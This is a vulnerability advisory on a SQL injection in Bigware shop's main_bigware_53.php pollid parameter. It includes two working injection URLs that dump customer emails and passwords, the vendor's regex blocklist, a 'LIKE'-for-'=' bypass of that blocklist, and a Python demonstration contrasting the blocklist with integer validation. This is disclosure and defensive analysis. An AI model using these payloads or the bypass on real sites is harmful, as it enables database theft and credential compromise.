SQL injection in main_bigware_53.php

Summary

The Bigware shop software prior to version 2.15 contains a SQL injection in main_bigware_53.php (pollid parameter), resulting in full database compromise. The filter introduced as the patch for CVE-2008-0498 can be bypassed by replacing the '=' sign with 'LIKE'.

Proof of concept:

Original exploit (see exploit-db.com/exploits/5002/):

main_bigware_53.php?op=results&pollid=-1/**/and/**/voteid=0/**/and/**/language_id=5 
/**/and/**/1=1/**/UnIOn/**/SeLeCt/**/ConCat(former_email_address,0x3a,former_password)
/**/FrOM/**/former/**/WhEre/**/former_id=1/*

Modified (and cleaned up) exploit:

main_bigware_53.php?op=results&pollid=-1 AND voteid=0 AND language_id=5
AND 1 LIKE 1 UNION SELECT GROUP_CONCAT(former_groups_id, char(58),
former_email_address,char(58), former_password) FROM former --

Timeline:

12/10/2011: Vendor contacted
12/10/2011: Vendor response
12/18/2011: Vendor patch release
12/19/2011: Vendor requested time to notify customers
01/23/2012: Disclosure


Input sanitization

During the work on the SQL injection in main_bigware_43.php I stumbled upon the patch for CVE-2008-0498. It is a script named 'stop_injections.php' with the following code (error messages truncated):

<?php
// stop_injections.php as shipped (error messages truncated here).
// Blocklist: reject the request if any value contains "or" followed somewhere
// by <x><y> = <y>, i.e. a tautology such as 1=1 or 'a'='a'.
$SQLInjectionRegexOR = '/[\'")]* *[o][r] *.*(.)(.) *= *\\2(?:--)?\\1?/i';
$suspiciousQueryItemsOR = preg_grep($SQLInjectionRegexOR, $_REQUEST);
if (!empty($suspiciousQueryItemsOR)) die('This is not allowed. If you believe we  …');
// Same pattern keyed on "and".
$SQLInjectionRegexAND = '/[\'")]* *[a][n][d] *.*(.)(.) *= *\\2(?:--)?\\1?/i';
$suspiciousQueryItemsAND = preg_grep($SQLInjectionRegexAND, $_REQUEST);
if (!empty($suspiciousQueryItemsAND)) die('This is not allowed. If you believe …');

My regex knowledge sucks a bit and I was not sure, so I contacted a good friend. He looked at the regex and told me that the expressions just look for 'or'/'and' plus '=' somewhere. And what happens if I use 'like' instead of '='? Correct, the filter does not apply. Hint: sqlmap contains a tamper script 'equaltolike.py'.
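To make the bypass concrete, here is an added example (not code from the advisory, the vendor, or sqlmap) that ports the two regexes from stop_injections.php unchanged to Python's re module, feeds both exploit URLs through the equivalent of preg_grep() over $_REQUEST, and contrasts that blocklist with the allowlist check a numeric parameter should get instead. The request parsing, the function names and the pollid validation rule are assumptions of this example; the shop's own parsing and the vendor's actual fix are not shown on the page.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The two PCRE patterns from stop_injections.php, ported unchanged to Python's
# re module (PHP's /i flag becomes re.IGNORECASE). Each looks for "or" / "and",
# then anything, then two characters <x><y>, optional spaces, "=", optional
# spaces, and <y> again, i.e. the classic tautologies 1=1 and 'a'='a'.
# Nothing in either pattern cares about LIKE, BETWEEN, IN or any other operator.
FILTERS = {
    "or":  re.compile(r"""['")]* *[o][r] *.*(.)(.) *= *\2(?:--)?\1?""", re.IGNORECASE),
    "and": re.compile(r"""['")]* *[a][n][d] *.*(.)(.) *= *\2(?:--)?\1?""", re.IGNORECASE),
}

def request_from_url(url):
    """Approximate PHP's $_REQUEST for a GET request: parameter -> first value.
    (Assumption of this example; the shop's own request handling is not shown.)"""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}

def stop_injections(request):
    """Mimic preg_grep() over $_REQUEST: return the names of the filters that fire.
    An empty list means stop_injections.php would let the request through."""
    return [name for name, rx in FILTERS.items()
            if any(rx.search(value) for value in request.values())]

def pollid_is_valid(value):
    """Allowlist alternative (this example's suggestion, not the vendor's patch):
    pollid is a numeric id, so only an unsigned integer literal is accepted and
    everything else is rejected before it can reach the query."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None

# Constructed inputs: the two URLs from the advisory plus a benign request.
# Spaces are kept literal here; a client would send %20 or +, which parse_qs
# decodes to the same value.
ORIGINAL_URL = ("main_bigware_53.php?op=results&pollid=-1/**/and/**/voteid=0/**/and/**/"
                "language_id=5/**/and/**/1=1/**/UnIOn/**/SeLeCt/**/ConCat(former_email_address,"
                "0x3a,former_password)/**/FrOM/**/former/**/WhEre/**/former_id=1/*")
LIKE_URL = ("main_bigware_53.php?op=results&pollid=-1 AND voteid=0 AND language_id=5 "
            "AND 1 LIKE 1 UNION SELECT GROUP_CONCAT(former_groups_id, char(58), "
            "former_email_address,char(58), former_password) FROM former --")
BENIGN_URL = "main_bigware_53.php?op=results&pollid=7"

def verdicts():
    """Run both layers over all three requests.
    Returns {label: (blocklist_hits, allowlist_accepts_pollid)}."""
    out = {}
    for label, url in (("original", ORIGINAL_URL), ("like", LIKE_URL), ("benign", BENIGN_URL)):
        req = request_from_url(url)
        out[label] = (stop_injections(req), pollid_is_valid(req["pollid"]))
    return out

if __name__ == "__main__":
    for label, (hits, ok) in verdicts().items():
        print(f"{label:8s} blocklist hits={hits or 'none'!s:<9} allowlist accepts pollid={ok}")
```

The original exploit trips the "and" filter on its 1=1 tautology, while the LIKE variant passes both regexes untouched because it never puts an '=' after 'and' or 'or'. The allowlist rejects both payloads and accepts the benign id, which is the point: a numeric parameter should be validated as a number (or bound as one in a prepared statement), not pattern-matched against a list of known attack strings.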